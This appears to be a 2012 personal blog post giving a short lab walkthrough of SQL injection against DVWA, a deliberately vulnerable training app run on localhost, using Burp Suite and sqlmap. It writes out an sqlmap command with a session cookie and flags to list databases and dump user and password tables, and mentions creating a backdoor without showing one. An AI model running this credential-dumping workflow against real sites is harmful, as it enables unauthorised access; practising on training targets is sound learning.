=======================================================

Friday, September 14, 2012

DVWA : SQLi with sqlmap

DVWA is a web which develope for pentest ( Top 10 OWAPS ). In this section explain, to get user account with sqli and password then create backdoor on the server :
Let's play :
Running DVWA
==> Start service of HTTPD and Mysql server.
==> Open mantra browser and change foxyproxy to 127.0.0.1:8080
==> Open url 127.0.0.1 on mantra browser.
==> To read data request--using burpsuite--will capture if intercept on.
==> Using sqlmap to running sqli.

User and password default to enter DVWA:
Username : admin
Password  : password



##will work if level security of DVWA is low and medium ( which i have to try ).
 ==> Open burpsuite, change intercept on before push button submit.
 ==> Try to enter ' to check error syntax of php.

==> Read information which capture on burpsuite. 
==> Running sqlmap to execute sqli with command :
         --> #./sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=27&Submit=Submit#"  --cookie "security=low; PHPSESSID=10nvojklih9vonbt5tf4thfma3" --dbs
==> Available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql

==> To see coloum of database dvwa add command above with: -D dvwa --tables --dbs
==> Generate user and password , add command above: -T user --dump



=== DONE ===


"Keep to learn and try harder"
==========================================================================
==========================================================================

No comments:

Post a Comment


==========================================================================
==========================================================================

IIIIIIIIII SSSSSSSSSSSSSSS 222222222222222 CCCCCCCCCCCCC
I::::::::I SS:::::::::::::::S2:::::::::::::::22 CCC::::::::::::C
I::::::::IS:::::SSSSSS::::::S2::::::222222:::::2 CC:::::::::::::::C
II::::::IIS:::::S SSSSSSS2222222 2:::::2 C:::::CCCCCCCC::::C
I::::I S:::::S 2:::::2 C:::::C CCCCCC
I::::I S:::::S 2:::::2C:::::C
I::::I S::::SSSS 2222::::2 C:::::C
I::::I SS::::::SSSSS 22222::::::22 C:::::C
I::::I SSS::::::::SS 22::::::::222 C:::::C
I::::I SSSSSS::::S 2:::::22222 C:::::C
I::::I S:::::S2:::::2 C:::::C
I::::I S:::::S2:::::2 C:::::C CCCCCC
II::::::IISSSSSSS S:::::S2:::::2 222222 C:::::CCCCCCCC::::C
I::::::::IS::::::SSSSSS:::::S2::::::2222222:::::2 CC:::::::::::::::C
I::::::::IS:::::::::::::::SS 2::::::::::::::::::2 CCC::::::::::::C
IIIIIIIIII SSSSSSSSSSSSSSS 22222222222222222222 CCCCCCCCCCCCC

==========================================================================
==========================================================================

My Classmate


==========================================================================
( ) ) ( ( (
* ) )\ ) ( /( ( /( ( )\ ) )\ ) )\ )
` ) /((()/( )\()) )\()) )\ (()/((()/( ( (()/(
( )(_))/(_))((_)\ ((_)\((((_)( /(_))/(_)) )\ /(_))
(_(_())(_)) __ ((_) _((_))\ _ )\ (_)) (_))_ ((_) (_))
|_ _|| _ \\ \ / / | || |(_)_\(_)| _ \ | \ | __|| _ \
| | | / \ V / | __ | / _ \ | / | |) || _| | /
|_| |_|_\ |_| |_||_|/_/ \_\ |_|_\ |___/ |___||_|_\

==========================================================================